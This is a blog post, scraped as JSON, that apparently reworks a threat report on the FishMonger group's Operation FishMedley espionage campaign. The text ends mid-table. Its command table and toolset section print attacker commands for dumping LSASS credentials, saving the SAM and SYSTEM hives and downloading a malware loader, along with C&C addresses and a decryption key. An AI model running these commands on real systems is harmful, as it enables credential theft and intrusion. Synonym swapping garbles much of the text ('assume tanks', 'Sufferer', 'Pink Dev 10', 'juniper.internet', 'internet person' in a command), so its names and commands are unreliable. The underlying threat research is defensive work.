{"id":7681,"date":"2025-10-14T17:31:50","date_gmt":"2025-10-14T17:31:50","guid":{"rendered":"https:\/\/techtrendfeed.com\/?p=7681"},"modified":"2025-10-14T17:31:51","modified_gmt":"2025-10-14T17:31:51","slug":"operation-fishmedley-concentrating-on-governments-ngos-and-assume-tanks","status":"publish","type":"post","link":"https:\/\/techtrendfeed.com\/?p=7681","title":{"rendered":"Operation FishMedley concentrating on governments, NGOs, and assume tanks"},"content":{"rendered":"<p> <br \/>\n<\/p>\n<div>\n<p>On March 5<sup>th<\/sup>, 2025, the US DOJ unsealed an indictment in opposition to staff of the Chinese language contractor I\u2011SOON for his or her involvement in a number of world espionage operations. These embrace assaults that we beforehand documented and attributed to the FishMonger APT group \u2013 I\u2011SOON\u2019s operational arm \u2013 together with the compromise of seven organizations that we recognized as being focused in a 2022 marketing campaign that we named Operation FishMedley.<\/p>\n<blockquote>\n<p><strong>Key factors of this blogpost:<\/strong><\/p>\n<ul>\n<li>Verticals focused throughout Operation FishMedley embrace governments, NGOs, and assume tanks, throughout Asia, Europe, and america.<\/li>\n<li>Operators used implants \u2013 resembling ShadowPad, SodaMaster, and Spyder \u2013 which can be frequent or unique to China-aligned menace actors.<\/li>\n<li>We assess with excessive confidence that Operation FishMedley was carried out by the FishMonger APT group.<\/li>\n<li>Impartial of the DOJ indictment, we decided that FishMonger is operated by I\u2011SOON.<\/li>\n<\/ul>\n<\/blockquote>\n<h2>FishMonger profile<\/h2>\n<p>FishMonger \u2013 a bunch believed to be operated by the Chinese language contractor I\u2011SOON (see our <a rel=\"nofollow\" target=\"_blank\" href=\"https:\/\/web-assets.esetstatic.com\/wls\/en\/papers\/threat-reports\/eset-apt-activity-report-q4-2023-q1-2024.pdf\" target=\"_blank\" rel=\"noopener\">This fall\u00a02023-Q1\u00a02024 APT Exercise Report<\/a>) \u2013 falls underneath the Winnti Group umbrella and is more than likely working out of China, from town of Chengdu the place I\u2011SOON\u2019s workplace was <a rel=\"nofollow\" target=\"_blank\" href=\"https:\/\/substack.com\/home\/post\/p-155672015\">positioned<\/a>. FishMonger is also called Earth Lusca, TAG\u201122, Aquatic Panda, or Pink Dev 10. We <a rel=\"nofollow\" target=\"_blank\" href=\"https:\/\/www.welivesecurity.com\/2020\/01\/31\/winnti-group-targeting-universities-hong-kong\/\" target=\"_blank\" rel=\"noopener\">revealed<\/a> an evaluation of this group in early 2020 when it closely focused universities in Hong Kong through the civic protests that began in June 2019. We initially attributed the incident to Winnti Group however have since revised our attribution to FishMonger.<\/p>\n<p>The group is understood to function watering-hole assaults, as reported by <a rel=\"nofollow\" target=\"_blank\" href=\"https:\/\/www.trendmicro.com\/en_us\/research\/21\/g\/biopass-rat-new-malware-sniffs-victims-via-live-streaming.html\" target=\"_blank\" rel=\"noopener\">Development Micro<\/a>. FishMonger\u2019s toolset consists of ShadowPad, Spyder, Cobalt Strike, FunnySwitch, SprySOCKS, and the BIOPASS RAT.<\/p>\n<h2>Overview<\/h2>\n<p>On March 5<sup>th<\/sup>, 2025, the US Division of Justice revealed a <a rel=\"nofollow\" target=\"_blank\" href=\"https:\/\/www.justice.gov\/opa\/pr\/justice-department-charges-12-chinese-contract-hackers-and-law-enforcement-officers-global\" target=\"_blank\" rel=\"noopener\">press launch<\/a> and unsealed an <a rel=\"nofollow\" target=\"_blank\" href=\"https:\/\/www.justice.gov\/usao-sdny\/media\/1391751\/dl?inline\" target=\"_blank\" rel=\"noopener\">indictment<\/a> in opposition to I\u2011SOON staff and officers of China\u2019s Ministry of Public Safety concerned in a number of espionage campaigns from 2016 to 2023. The FBI additionally added these named within the indictment to its <a rel=\"nofollow\" target=\"_blank\" href=\"https:\/\/www.fbi.gov\/wanted\/cyber\/aquatic-panda-cyber-threat-actors\" target=\"_blank\" rel=\"noopener\">\u201cmost wished\u201d checklist<\/a> and revealed a poster, as seen in Determine 1.<\/p>\n<figure class=\"image align-center\"><img decoding=\"async\" title=\"Figure 1. Names of FishMonger \/ I-SOON members (source: FBI)\" src=\"https:\/\/web-assets.esetstatic.com\/wls\/2025\/03-25\/fishmedley\/figure-1.gif\" alt=\"Figure 1. Names of FishMonger I-SOON members\" width=\"\" height=\"\"\/><figcaption><em>Determine 1. Names of FishMonger \/ I\u2011SOON members (supply: FBI)<\/em><\/figcaption><\/figure>\n<p>The indictment describes a number of assaults which can be strongly associated to what we revealed in a <a rel=\"nofollow\" target=\"_blank\" href=\"https:\/\/www.eset.com\/int\/business\/services\/threat-intelligence\/\" target=\"_blank\" rel=\"noopener\">personal APT intelligence report<\/a> in early 2023. On this blogpost, we share our technical data about this world marketing campaign that focused governments, NGOs, and assume tanks throughout Asia, Europe, and america. We imagine that this data enhances the lately revealed indictment.<\/p>\n<p>Throughout 2022, we investigated a number of compromises the place implants resembling ShadowPad and SodaMaster, that are generally employed by China-aligned menace actors, had been used. We had been capable of cluster seven unbiased incidents for this blogpost and have named that marketing campaign Operation FishMedley.<\/p>\n<h3>FishMonger and I-SOON<\/h3>\n<p>Throughout our analysis, we had been capable of independently decide that FishMonger is an espionage staff operated by I\u2011SOON, a Chinese language contractor based mostly in Chengdu that suffered an notorious doc leak in 2024 \u2013 see this complete evaluation from <a rel=\"nofollow\" target=\"_blank\" href=\"https:\/\/harfanglab.io\/insidethelab\/isoon-leak-analysis\/\">Harfang Labs<\/a>.<\/p>\n<h3>Victimology<\/h3>\n<p>Desk 1 reveals particulars in regards to the seven victims we recognized. The verticals and international locations are numerous, however most are of apparent curiosity to the Chinese language authorities.<\/p>\n<p style=\"text-align: center;\"><em>Desk 1. Victimology particulars<\/em><\/p>\n<table border=\"1\" width=\"642\" cellspacing=\"0\" cellpadding=\"0\">\n<thead>\n<tr>\n<td width=\"75\"><strong>Sufferer<\/strong> <\/td>\n<td width=\"161\"><strong>Date of compromise<\/strong> <\/td>\n<td width=\"123\"><strong>Nation<\/strong> <\/td>\n<td width=\"262\"><strong>Vertical<\/strong> <\/td>\n<\/tr>\n<\/thead>\n<tbody>\n<tr>\n<td width=\"75\"><strong>A<\/strong> <\/td>\n<td width=\"161\">January 2022 <\/td>\n<td width=\"123\">Taiwan <\/td>\n<td width=\"262\">Governmental group. <\/td>\n<\/tr>\n<tr>\n<td width=\"75\"><strong>B<\/strong> <\/td>\n<td width=\"161\">January 2022 <\/td>\n<td width=\"123\">Hungary <\/td>\n<td width=\"262\">Catholic group. <\/td>\n<\/tr>\n<tr>\n<td width=\"75\"><strong>C<\/strong> <\/td>\n<td width=\"161\">February 2022 <\/td>\n<td width=\"123\">Turkey <\/td>\n<td width=\"262\">Unknown. <\/td>\n<\/tr>\n<tr>\n<td width=\"75\"><strong>D<\/strong> <\/td>\n<td width=\"161\">March 2022 <\/td>\n<td width=\"123\">Thailand <\/td>\n<td width=\"262\">Governmental group. <\/td>\n<\/tr>\n<tr>\n<td width=\"75\"><strong>E<\/strong> <\/td>\n<td width=\"161\">April 2022 <\/td>\n<td width=\"123\">United States <\/td>\n<td width=\"262\">Catholic charity working worldwide. <\/td>\n<\/tr>\n<tr>\n<td width=\"75\"><strong>F<\/strong> <\/td>\n<td width=\"161\">June 2022 <\/td>\n<td width=\"123\">United States <\/td>\n<td width=\"262\">NGO \u2013 primarily lively in Asia. <\/td>\n<\/tr>\n<tr>\n<td width=\"75\"><strong>G<\/strong> <\/td>\n<td width=\"161\">October 2022 <\/td>\n<td width=\"123\">France <\/td>\n<td width=\"262\">Geopolitical assume tank. <\/td>\n<\/tr>\n<\/tbody>\n<\/table>\n<p>Desk 2 summarizes the implants used throughout every intrusion of Operation FishMedley.<\/p>\n<p style=\"text-align: center;\"><em>Desk 2. Particulars of the implants used in opposition to every sufferer<\/em><\/p>\n<div style=\"overflow-x: auto;\">\n<table border=\"1\" width=\"642\" cellspacing=\"0\" cellpadding=\"0\">\n<thead>\n<tr style=\"height: 75px;\">\n<td style=\"background-color: #f0f0f0; width: 150px; text-align: center;\">Sufferer | Instrument<\/td>\n<td style=\"background-color: #f0f0f0; width: 200px; text-align: center;\">ScatterBee-packed ShadowPad<\/td>\n<td style=\"background-color: #f0f0f0; width: 125px; text-align: center;\">Spyder<\/td>\n<td style=\"background-color: #f0f0f0; width: 125px; text-align: center;\">SodaMaster<\/td>\n<td style=\"background-color: #f0f0f0; width: 125px; text-align: center;\">RPipeCommander<\/td>\n<\/tr>\n<\/thead>\n<tbody>\n<tr>\n<td style=\"text-align: center;\" width=\"144\"><strong>A<\/strong><\/td>\n<td style=\"text-align: center;\" width=\"125\"><strong>\u25cf<\/strong><\/td>\n<td style=\"text-align: center;\" width=\"125\">\u00a0<\/td>\n<td style=\"text-align: center;\" width=\"125\">\u00a0<\/td>\n<td style=\"text-align: center;\" width=\"125\">\u00a0<\/td>\n<\/tr>\n<tr>\n<td style=\"text-align: center;\" width=\"144\"><strong>B<\/strong><\/td>\n<td style=\"text-align: center;\" width=\"125\">\u00a0<\/td>\n<td style=\"text-align: center;\" width=\"125\">\u00a0<\/td>\n<td style=\"text-align: center;\" width=\"125\"><strong>\u25cf<\/strong><\/td>\n<td style=\"text-align: center;\" width=\"125\">\u00a0<\/td>\n<\/tr>\n<tr>\n<td style=\"text-align: center;\" width=\"144\"><strong>C<\/strong><\/td>\n<td style=\"text-align: center;\" width=\"125\">\u00a0<\/td>\n<td style=\"text-align: center;\" width=\"125\">\u00a0<\/td>\n<td style=\"text-align: center;\" width=\"125\"><strong>\u25cf<\/strong><\/td>\n<td style=\"text-align: center;\" width=\"125\">\u00a0<\/td>\n<\/tr>\n<tr>\n<td style=\"text-align: center;\" width=\"144\"><strong>D<\/strong><\/td>\n<td style=\"text-align: center;\" width=\"125\"><strong>\u25cf<\/strong><\/td>\n<td style=\"text-align: center;\" width=\"125\"><strong>\u25cf<\/strong><\/td>\n<td style=\"text-align: center;\" width=\"125\">\u00a0<\/td>\n<td style=\"text-align: center;\" width=\"125\"><strong>\u25cf<\/strong><\/td>\n<\/tr>\n<tr>\n<td style=\"text-align: center;\" width=\"144\"><strong>E<\/strong><\/td>\n<td style=\"text-align: center;\" width=\"125\">\u00a0<\/td>\n<td style=\"text-align: center;\" width=\"125\">\u00a0<\/td>\n<td style=\"text-align: center;\" width=\"125\"><strong>\u25cf<\/strong><\/td>\n<td style=\"text-align: center;\" width=\"125\">\u00a0<\/td>\n<\/tr>\n<tr>\n<td style=\"text-align: center;\" width=\"144\"><strong>F<\/strong><\/td>\n<td style=\"text-align: center;\" width=\"125\"><strong>\u25cf<\/strong><\/td>\n<td style=\"text-align: center;\" width=\"125\">\u00a0<\/td>\n<td style=\"text-align: center;\" width=\"125\"><strong>\u25cf<\/strong><\/td>\n<td style=\"text-align: center;\" width=\"125\">\u00a0<\/td>\n<\/tr>\n<tr>\n<td style=\"text-align: center;\" width=\"144\"><strong>G<\/strong><\/td>\n<td style=\"text-align: center;\" width=\"125\">\u00a0<\/td>\n<td style=\"text-align: center;\" width=\"125\">\u00a0<\/td>\n<td style=\"text-align: center;\" width=\"125\"><strong>\u25cf<\/strong><\/td>\n<td style=\"text-align: center;\" width=\"125\">\u00a0<\/td>\n<\/tr>\n<\/tbody>\n<\/table>\n<\/div>\n<h2>Technical evaluation<\/h2>\n<h3>Preliminary entry<\/h3>\n<p>We had been unable to determine the preliminary compromise vectors. For many instances, the attackers appeared to have had privileged entry contained in the native community, resembling area administrator credentials.<\/p>\n<p>At Sufferer D, the attackers gained entry to an admin console and used it to deploy implants on different machines within the native community. It&#8217;s possible that they first compromised the machine of a sysadmin or safety analyst after which stole credentials that allowed them to connect with the console.<\/p>\n<p>At Sufferer F, the implants had been delivered utilizing <a rel=\"nofollow\" target=\"_blank\" href=\"https:\/\/github.com\/fortra\/impacket\">Impacket<\/a>, which signifies that the attackers by some means beforehand compromised a high-privilege area account.<\/p>\n<h3>Lateral motion<\/h3>\n<p>At Sufferer F, the operators additionally used Impacket to maneuver laterally. They gathered data on different native machines and put in implants.<\/p>\n<p>Desk 3 reveals that the operators first did some handbook reconnaissance utilizing <span style=\"font-family: courier new, courier, monospace;\">quser.exe<\/span>, <span style=\"font-family: courier new, courier, monospace;\">wmic.exe<\/span>, and <span style=\"font-family: courier new, courier, monospace;\">ipconfig.exe<\/span>. Then they tried to get credentials and different secrets and techniques by <a rel=\"nofollow\" target=\"_blank\" href=\"https:\/\/www.microsoft.com\/en-us\/security\/blog\/2022\/10\/05\/detecting-and-preventing-lsass-credential-dumping-attacks\/\">dumping<\/a> the native safety authority subsystem service (LSASS) course of (PID 944). The PID of the method was obtained by way of <span style=\"font-family: courier new, courier, monospace;\">tasklist \/svc<\/span> and the dump was carried out utilizing <span style=\"font-family: courier new, courier, monospace;\">comsvcs.dll<\/span>, which is a recognized living-off-the-land binary (<a rel=\"nofollow\" target=\"_blank\" href=\"https:\/\/lolbas-project.github.io\/lolbas\/Libraries\/comsvcs\/\">LOLBIN<\/a>). Word that it&#8217;s probably that the attackers executed <span style=\"font-family: courier new, courier, monospace;\">quser.exe<\/span> to see whether or not different customers or admins had been additionally logged in, that means privileged accesses had been current in LSASS. Based on <a rel=\"nofollow\" target=\"_blank\" href=\"https:\/\/learn.microsoft.com\/en-us\/windows-server\/administration\/windows-commands\/quser\">Microsoft documentation<\/a>, to make use of this command the attacker will need to have Full Management permission or particular entry permission.<\/p>\n<p>In addition they saved the registry hives <span style=\"font-family: courier new, courier, monospace;\">sam.hive<\/span> and <span style=\"font-family: courier new, courier, monospace;\">system.hive<\/span>, which may each include secrets and techniques or credentials.<\/p>\n<p>Lastly, they tried to dump the LSASS course of once more, utilizing a <span style=\"font-family: courier new, courier, monospace;\">for<\/span> loop iterating over the output from <span style=\"font-family: courier new, courier, monospace;\">tasklist.exe<\/span>. We&#8217;ve seen this identical code used on different machines, so it&#8217;s a good suggestion to dam or at the least alert on it.<\/p>\n<p style=\"break-after: avoid; text-align: center;\"><em>Desk 3. Instructions executed by way of Impacket on a machine at Sufferer F<\/em><\/p>\n<h3><span style=\"font-size: medium; font-weight: 400;\"><\/p>\n<table border=\"1\" width=\"642\" cellspacing=\"0\" cellpadding=\"0\">\n<thead>\n<tr>\n<td width=\"141\"><strong>Timestamp (UTC)<\/strong><\/td>\n<td width=\"501\"><strong>Command<\/strong><\/td>\n<\/tr>\n<\/thead>\n<tbody>\n<tr>\n<td style=\"white-space: nowrap;\" width=\"141\">2022-06-21 07:34:07<\/td>\n<td width=\"501\"><span style=\"font-family: courier new, courier, monospace;\">quser<\/span><\/td>\n<\/tr>\n<tr>\n<td width=\"141\">2022-06-21 14:41:23<\/td>\n<td width=\"501\"><span style=\"font-family: courier new, courier, monospace;\">wmic os get lastbootuptime<\/span><\/td>\n<\/tr>\n<tr>\n<td width=\"141\">2022-06-21 14:41:23<\/td>\n<td width=\"501\"><span style=\"font-family: courier new, courier, monospace;\">ipconfig \/all<\/span><\/td>\n<\/tr>\n<tr>\n<td width=\"141\">2022-06-21 14:41:23<\/td>\n<td width=\"501\"><span style=\"font-family: courier new, courier, monospace;\">tasklist \/svc<\/span><\/td>\n<\/tr>\n<tr>\n<td width=\"141\">2022-06-21 14:41:23<\/td>\n<td width=\"501\"><span style=\"font-family: courier new, courier, monospace;\">C:WindowsSystem32WindowsPowerShellv1.0powershell.exe -c &#8220;C:WindowsSystem32rundll32 C:windowssystem32comsvcs.dll, MiniDump 944 c:userspublicmusictemp.tmp full&#8221;<\/span><\/td>\n<\/tr>\n<tr>\n<td width=\"141\">2022-06-21 14:41:23<\/td>\n<td width=\"501\"><span style=\"font-family: courier new, courier, monospace;\">reg save hklmsam C:userspublicmusicsam.hive<\/span><\/td>\n<\/tr>\n<tr>\n<td width=\"141\">2022-06-21 14:41:23<\/td>\n<td width=\"501\"><span style=\"font-family: courier new, courier, monospace;\">reg save hklmsystem C:userspublicmusicsystem.hive<\/span><\/td>\n<\/tr>\n<tr>\n<td width=\"141\">2022-06-21 14:41:23<\/td>\n<td width=\"501\"><span style=\"font-family: courier new, courier, monospace;\">internet person<\/span><\/td>\n<\/tr>\n<tr>\n<td width=\"141\">2022-06-22 07:05:37<\/td>\n<td width=\"501\"><span style=\"font-family: courier new, courier, monospace;\">tasklist \/v<\/span><\/td>\n<\/tr>\n<tr>\n<td width=\"141\">2022-06-22 07:07:33<\/td>\n<td width=\"501\"><span style=\"font-family: courier new, courier, monospace;\">dir c:customers<\/span><\/td>\n<\/tr>\n<tr>\n<td width=\"141\">2022-06-22 09:47:52<\/td>\n<td width=\"501\"><span style=\"font-family: courier new, courier, monospace;\">for \/f &#8220;tokens=1,2 delims= &#8221; ^%A in (&#8216;&#8221;tasklist \/fi &#8220;Imagename eq lsass.exe&#8221; | discover &#8220;lsass&#8221;&#8221;&#8216;) do rundll32.exe C:windowsSystem32comsvcs.dll, MiniDump ^%B WindowsTempYDWS6P.xml full<\/span><\/td>\n<\/tr>\n<\/tbody>\n<\/table>\n<p><\/span><\/h3>\n<h3>Toolset<\/h3>\n<h4>ShadowPad<\/h4>\n<p>ShadowPad is a well known and privately offered modular backdoor, recognized to solely be equipped to China-aligned APT teams, together with <a rel=\"nofollow\" target=\"_blank\" href=\"https:\/\/www.welivesecurity.com\/2020\/01\/31\/winnti-group-targeting-universities-hong-kong\/\">FishMonger<\/a> and <a rel=\"nofollow\" target=\"_blank\" href=\"https:\/\/www.welivesecurity.com\/2021\/08\/24\/sidewalk-may-be-as-dangerous-as-crosswalk\/\">SparklingGoblin<\/a>, as documented by <a rel=\"nofollow\" target=\"_blank\" href=\"https:\/\/assets.sentinelone.com\/c\/Shadowpad?x=P42eqA#page=1\">SentinelOne<\/a>. In Operation FishMedley, the attackers used a ShadowPad model full of <a rel=\"nofollow\" target=\"_blank\" href=\"https:\/\/www.pwc.co.uk\/issues\/cyber-security-services\/research\/chasing-shadows.html\">ScatterBee<\/a>.<\/p>\n<p>At Sufferer D, the loader was downloaded utilizing the next PowerShell command:<\/p>\n<p><span style=\"font-family: courier new, courier, monospace;\">powershell (new-object System.Web.WebClient).DownloadFile(&#8220;http:\/\/<victim>\/Pictures\/menu\/log.dll&#8221;;&#8221;c:userspubliclog.dll&#8221;)<\/victim><\/span><\/p>\n<p>This reveals that the attackers compromised an internet server on the sufferer\u2019s group to make use of it as a staging server for his or her malware.<\/p>\n<p>At Sufferer F, Firefox was used to obtain the loader, from <span style=\"font-family: courier new, courier, monospace;\">http:\/\/5.188.230[.]47\/log.dll<\/span>. We don\u2019t know whether or not attackers had interactive entry to the machine, whether or not one other piece of malware was working within the Firefox course of, or whether or not the sufferer was redirected to the obtain web page, say by way of a watering-hole assault.<\/p>\n<p><span style=\"font-family: courier new, courier, monospace;\">log.dll<\/span> is side-loaded by an previous Bitdefender executable (authentic title: <span style=\"font-family: courier new, courier, monospace;\">BDReinit.exe<\/span>) and masses ShadowPad from a file named <span style=\"font-family: courier new, courier, monospace;\">log.dll.dat<\/span>, which might be decrypted utilizing the scripts offered in PwC\u2019s <a rel=\"nofollow\" target=\"_blank\" href=\"https:\/\/github.com\/PwCUK-CTO\/ScatterBee_Analysis\">GitHub<\/a> repository.<\/p>\n<p>We didn&#8217;t get better the <span style=\"font-family: courier new, courier, monospace;\">log.dll.dat<\/span> from the sufferer\u2019s machine, however we discovered a faux Adobe Flash installer on <a rel=\"nofollow\" target=\"_blank\" href=\"https:\/\/www.virustotal.com\/gui\/file\/9447B75AF497E5A7F99F1DED1C1D87C53B5B59FCE224A325932AD55EEF9E0E4A\">VirusTotal<\/a> with the equivalent <span style=\"font-family: courier new, courier, monospace;\">log.dll<\/span> file. The configuration of the ShadowPad payload is offered in Desk 4.<\/p>\n<p style=\"break-after: avoid; text-align: center;\"><em>Desk 4. ShadowPad configuration<\/em><\/p>\n<table border=\"1\" width=\"642\" cellspacing=\"0\" cellpadding=\"0\">\n<thead>\n<tr>\n<td width=\"198\"><strong>Discipline<\/strong><\/td>\n<td width=\"444\"><strong>Decrypted worth<\/strong><\/td>\n<\/tr>\n<\/thead>\n<tbody>\n<tr>\n<td width=\"198\"><strong>Timestamp<\/strong><\/td>\n<td width=\"444\"><span style=\"font-family: courier new, courier, monospace;\">3\/14\/2022 10:52:16 PM<\/span><\/td>\n<\/tr>\n<tr>\n<td width=\"198\"><strong>Marketing campaign code<\/strong><\/td>\n<td width=\"444\"><span style=\"font-family: courier new, courier, monospace;\">2203<\/span><\/td>\n<\/tr>\n<tr>\n<td width=\"198\"><strong>File path<\/strong><\/td>\n<td width=\"444\"><span style=\"font-family: courier new, courier, monospace;\">%ALLUSERSPROFILEpercentDRMTest<\/span><\/td>\n<\/tr>\n<tr>\n<td width=\"198\"><strong>Spoofed title<\/strong><\/td>\n<td width=\"444\"><span style=\"font-family: courier new, courier, monospace;\">Check.exe<\/span><\/td>\n<\/tr>\n<tr>\n<td width=\"198\"><strong>Loader filename<\/strong><\/td>\n<td width=\"444\"><span style=\"font-family: courier new, courier, monospace;\">log.dll<\/span><\/td>\n<\/tr>\n<tr>\n<td width=\"198\"><strong>Payload filename<\/strong><\/td>\n<td width=\"444\"><span style=\"font-family: courier new, courier, monospace;\">log.dll.dat<\/span><\/td>\n<\/tr>\n<tr>\n<td width=\"198\"><strong>Service title<\/strong><\/td>\n<td width=\"444\"><span style=\"font-family: courier new, courier, monospace;\">MyTest2<\/span><\/td>\n<\/tr>\n<tr>\n<td width=\"198\"><strong>Different service title<\/strong><\/td>\n<td width=\"444\"><span style=\"font-family: courier new, courier, monospace;\">MyTest2<\/span><\/td>\n<\/tr>\n<tr>\n<td width=\"198\"><strong>Different service title<\/strong><\/td>\n<td width=\"444\"><span style=\"font-family: courier new, courier, monospace;\">MyTest2<\/span><\/td>\n<\/tr>\n<tr>\n<td width=\"198\"><strong>Registry key path<\/strong><\/td>\n<td width=\"444\"><span style=\"font-family: courier new, courier, monospace;\">SOFTWAREMicrosoftWindowsCurrentVersionRun<\/span><\/td>\n<\/tr>\n<tr>\n<td width=\"198\"><strong>Service description<\/strong><\/td>\n<td width=\"444\"><span style=\"font-family: courier new, courier, monospace;\">MyTest2<\/span><\/td>\n<\/tr>\n<tr>\n<td width=\"198\"><strong>Program to inject into<\/strong><\/td>\n<td width=\"444\"><span style=\"font-family: courier new, courier, monospace;\">%ProgramFilespercentWindows Media Playerwmplayer.exe<\/span><\/td>\n<\/tr>\n<tr>\n<td width=\"198\"><strong>Different injection goal<\/strong><\/td>\n<td width=\"444\"><span style=\"font-family: courier new, courier, monospace;\">N\/A<\/span><\/td>\n<\/tr>\n<tr>\n<td width=\"198\"><strong>Different injection goal<\/strong><\/td>\n<td width=\"444\"><span style=\"font-family: courier new, courier, monospace;\">N\/A<\/span><\/td>\n<\/tr>\n<tr>\n<td width=\"198\"><strong>Different injection goal<\/strong><\/td>\n<td width=\"444\"><span style=\"font-family: courier new, courier, monospace;\">%windirpercentsystem32svchost.exe<\/span><\/td>\n<\/tr>\n<tr>\n<td width=\"198\"><strong>C&amp;C URL<\/strong><\/td>\n<td width=\"444\"><span style=\"font-family: courier new, courier, monospace;\">TCP:\/\/api.googleauthenticatoronline[.]com:443<\/span><\/td>\n<\/tr>\n<tr>\n<td width=\"198\"><strong>Different C&amp;C URL<\/strong><\/td>\n<td width=\"444\"><span style=\"font-family: courier new, courier, monospace;\">UDP:\/\/api.googleauthenticatoronline[.]com:443<\/span><\/td>\n<\/tr>\n<tr>\n<td width=\"198\"><strong>Different C&amp;C URL<\/strong><\/td>\n<td width=\"444\"><span style=\"font-family: courier new, courier, monospace;\">N\/A<\/span><\/td>\n<\/tr>\n<tr>\n<td width=\"198\"><strong>Different C&amp;C URL<\/strong><\/td>\n<td width=\"444\"><span style=\"font-family: courier new, courier, monospace;\">N\/A<\/span><\/td>\n<\/tr>\n<tr>\n<td width=\"198\"><strong>Proxy data string<\/strong><\/td>\n<td width=\"444\"><span style=\"font-family: courier new, courier, monospace;\">SOCKS4nnnnn<\/span><\/td>\n<\/tr>\n<tr>\n<td width=\"198\"><strong>Proxy data string<\/strong><\/td>\n<td width=\"444\"><span style=\"font-family: courier new, courier, monospace;\">SOCKS4nnnnn<\/span><\/td>\n<\/tr>\n<tr>\n<td width=\"198\"><strong>Proxy data string<\/strong><\/td>\n<td width=\"444\"><span style=\"font-family: courier new, courier, monospace;\">SOCKS5nnnnn<\/span><\/td>\n<\/tr>\n<tr>\n<td width=\"198\"><strong>Proxy data string<\/strong><\/td>\n<td width=\"444\"><span style=\"font-family: courier new, courier, monospace;\">SOCKS5nnnnn<\/span><\/td>\n<\/tr>\n<\/tbody>\n<\/table>\n<p>Word that from March 20<sup>th<\/sup>, 2022 to November 2<sup>nd<\/sup>, 2022, the C&amp;C area resolved to <span style=\"font-family: courier new, courier, monospace;\">213.59.118[.]124<\/span>, which is talked about in a VMware <a rel=\"nofollow\" target=\"_blank\" href=\"https:\/\/blogs.vmware.com\/security\/2022\/10\/threat-analysis-active-c2-discovery-using-protocol-emulation-part3-shadowpad.html\">blogpost<\/a> about ShadowPad.<\/p>\n<h4>Spyder<\/h4>\n<p>At Sufferer D, we detected one other backdoor usually utilized by FishMonger: Spyder, a modular implant that was analyzed in nice element by <a rel=\"nofollow\" target=\"_blank\" href=\"https:\/\/st.drweb.com\/static\/new-www\/news\/2021\/march\/BackDoor.Spyder.1_en.pdf\">Dr.Net<\/a>.<\/p>\n<p>A Spyder loader was downloaded from <span style=\"font-family: courier new, courier, monospace;\">http:\/\/<a_victim>\/Pictures\/menu\/aa.doc<\/a_victim><\/span> and dropped to <span style=\"font-family: courier new, courier, monospace;\">C:UsersPublictask.exe<\/span> round 18 hours after ShadowPad was put in.<\/p>\n<p>The loader \u2013 see Determine 2; reads the file <span style=\"font-family: courier new, courier, monospace;\">c:windowstempguid.dat<\/span> and decrypts its contents utilizing AES-CBC. The encryption secret is hardcoded: <span style=\"font-family: courier new, courier, monospace; white-space: nowrap;\">F4 E4 C6 9E DE E0 9E 82 00 00 00 00 00 00 00 00<\/span>. The initialization vector (IV) is the primary eight bytes of the important thing. Sadly, we had been unable to get better the <span style=\"font-family: courier new, courier, monospace;\">guid.dat<\/span> file.<\/p>\n<figure class=\"image\"><img decoding=\"async\" title=\"Figure 2. Spyder loader\" src=\"https:\/\/web-assets.esetstatic.com\/wls\/2025\/03-25\/fishmedley\/figure-2.png\" alt=\"Figure 2. Spyder loader\" width=\"\" height=\"\"\/><figcaption><em>Determine 2. Spyder loader<\/em><\/figcaption><\/figure>\n<p>Then, the loader injects the decoded content material \u2013 probably shellcode \u2013 into itself (<span style=\"font-family: courier new, courier, monospace;\">process.exe<\/span> course of) as seen in Determine 3.<\/p>\n<figure class=\"image\"><img decoding=\"async\" title=\"Figure 3. Spyder loader \u2013 injection part\" src=\"https:\/\/web-assets.esetstatic.com\/wls\/2025\/03-25\/fishmedley\/figure-3.png\" alt=\"Figure 3. Spyder loader \u2013 injection part\" width=\"\" height=\"\"\/><figcaption><em>Determine 3. Spyder loader \u2013 injection half<\/em><\/figcaption><\/figure>\n<p>Regardless of not acquiring the encrypted closing payload, our product did detect a Spyder payload in reminiscence and it was virtually equivalent to the Spyder variant documented by Dr.Net. The C&amp;C server was hardcoded to <span style=\"font-family: courier new, courier, monospace;\">61.238.103[.]165<\/span>.<\/p>\n<p>Curiously, a number of subdomains of <span style=\"font-family: courier new, courier, monospace;\">junlper[.]com<\/span>, a recognized Spyder C&amp;C area and a weak homoglyph area to <span style=\"font-family: courier new, courier, monospace;\">juniper.internet<\/span>, resolved to <span style=\"font-family: courier new, courier, monospace;\">61.238.103[.]165<\/span> in 2022.<\/p>\n<p>A self-signed TLS certificates was current on port 443 of the server from Could to December 2022, with the thumbprint <span style=\"font-family: courier new, courier, monospace;\">89EDCFFC66EDA3AEB75E140816702F9AC73A75F0<\/span>. Based on <a rel=\"nofollow\" target=\"_blank\" href=\"https:\/\/github.com\/SentineLabs\/Shadowpad\/blob\/main\/technical-indicators\">SentinelOne<\/a>, it&#8217;s a certificates utilized by FishMonger for its C&amp;C servers.<\/p>\n<h4>SodaMaster<\/h4>\n<p>SodaMaster is a backdoor that was documented by <a rel=\"nofollow\" target=\"_blank\" href=\"https:\/\/securelist.com\/apt10-sophisticated-multi-layered-loader-ecipekac-discovered-in-a41apt-campaign\/101519\/\">Kaspersky<\/a> in 2021. APT10 was the primary group recognized to have entry to this backdoor however Operation FishMedley signifies that it could now be shared amongst a number of China-aligned APT teams.<\/p>\n<p>SodaMaster can solely be discovered decrypted in reminiscence and that\u2019s the place we detected it. Though we didn&#8217;t get better the complete loading chain, we now have recognized just a few samples which can be step one of the chain.<\/p>\n<h5>SodaMaster loaders<\/h5>\n<p>We discovered six completely different malicious DLLs which can be abusing reputable executables by way of <a rel=\"nofollow\" target=\"_blank\" href=\"https:\/\/attack.mitre.org\/versions\/v16\/techniques\/T1574\/002\/\">DLL side-loading<\/a>. All of them implement the identical decryption and injection routine.<\/p>\n<p>First, the loader reads a hardcoded file, for instance <span style=\"font-family: courier new, courier, monospace;\">debug.png<\/span>, and XOR decrypts it utilizing a hardcoded 239-byte key. Desk 5 summarizes the completely different loaders. Word that the XOR key can also be completely different in every pattern, however too lengthy to be included within the desk. Additionally be aware that we didn&#8217;t get better any of those encrypted payloads.<\/p>\n<p style=\"break-after: avoid; text-align: center;\"><em>Desk 5. SodaMaster loaders<\/em><\/p>\n<table border=\"1\" width=\"642\" cellspacing=\"0\" cellpadding=\"0\">\n<thead>\n<tr>\n<td width=\"179\"><strong>SHA-1<\/strong><\/td>\n<td width=\"170\"><strong>DLL title<\/strong><\/td>\n<td width=\"293\"><strong>Payload filename<\/strong><\/td>\n<\/tr>\n<\/thead>\n<tbody>\n<tr>\n<td width=\"179\"><span style=\"font-family: courier new, courier, 